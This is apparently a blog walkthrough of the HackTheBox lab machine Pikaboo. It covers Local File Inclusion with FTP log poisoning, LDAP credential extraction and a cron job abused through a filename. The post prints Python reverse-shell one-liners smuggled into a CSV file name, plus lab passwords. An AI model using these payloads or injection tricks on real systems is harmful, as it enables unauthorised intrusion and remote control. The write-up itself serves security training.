In this post, I would like to share a walkthrough of the Pikaboo Machine from HackTheBox

This room has been considered difficulty rated as a Hard machine

Source: HackTheBox

What will you gain from the Pikaboo machine?

For user flag, you will need to locate a Local File Inclusion vulnerability on the website here you will get user privileges to access via FTP

As for the root flag, you will need to dig deeper within the machine especially LDAP service where you will get a username and password for FTP access

Information Gathering

Once we have started the VPN connection which requires to download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN 

As a result, we must whitelist the domain name for the machine “pikaboo.htb” 

Let’s open the browser and straight into the website interface.

Surprisingly, there is nothing that is found on the website

From the server-status web interface, we notice there are a few directories that we investigate it.

Finally, we can easily access the directory of /admin../admin_staging as it directs us to a Dashboard

By looking at the website URL, I’m fairly sure that the website has a Local File Inclusion

After I must roam the directory on the website, I managed to find /var/log/vsfptd.log. We managed to see an FTP log on that file.

Gaining Privileges Access

As a result, an NC listener should be running on our terminal to get the reverse shell connection back to us.

We can use the PHP reverse shell which I have done a cheat sheet here

We need to run FTP pikaboo.htb on the terminal which we should insert a PHP execution of shell as our username.

The reverse shell connection requires us to refresh the /var/log/vsfptd.log

Voila! We managed to get the reverse shell connection back to us when we investigate the NC listener terminal

We can clarify which user that we managed to access the machine.

For us to read the user flag by executing the “cat user.txt” command

Escalate to Root Privileges Access

Sadly, we didn’t manage to retrieve any information on SUID from the “sudo -l” command

From my experience, we can investigate crontab to see any latest command that has been running especially with Root Privileges Access.

When I have fully analyzed the crontab file, I notice that /usr/local/bin/csvupdate_cron have been running as root privileges access

While we analyze the content of the csvupdate_cron file, we notice we can abuse the CSV file format.

While roaming inside the server, I notice there’s a configuration file (/opt/pokeapi/config/settings.php) that looks like something shown above

We have managed to get the LDAP password on the file, and it might lead to FTP credentials by running the following command

ldapsearch -x -LLL -h -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w J~42%W?PFHl]g -b 'dc=ftp,dc=pikaboo,dc=htb' -s sub '(objectClass=*)'

As a result, the output that appears from the command above which you will see a base64 password. As a result, we need to decrypt the base64 password

The credentials that have been decrypted can be seen as below:

Username: pwnmeow
Password: _G0tT4_C4tcH'3m_4lL!_

We should be creating a file with the content as below:

touch pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")'; .csv"

We need to access the machine via FTP service by using the credentials that we found earlier

At last, we successfully logged into the machine via FTP, we should change to any subdirectory on the FTP service

Finally, we need to insert the reverse shellcode as following:

put  pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for\ f\ in(0,1,2)];pty.spawn(""\"sh\")'; .csv"

### We need to start our NC listener before running the command above ###

Based on crontab configuration, it will take around 1 minute to get a reverse shell connection back to us

We successfully access as Root Privileges

We can read the root flag by executing the command “cat root.txt” and submit the flag into Hackthebox website


Happy Learning Guys!

Extra Information

We can go to /etc/shadow to unlock the write-up

Leave a Reply

Your email address will not be published. Required fields are marked *